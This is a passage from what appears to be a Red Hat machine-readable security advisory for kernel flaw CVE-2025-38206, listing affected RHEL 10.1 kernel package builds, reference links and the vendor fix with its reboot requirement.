"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38206"
},
{
"category": "external",
"summary": "RHBZ#2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T"
}
],
"release_date": "2025-07-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-25T02:10:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
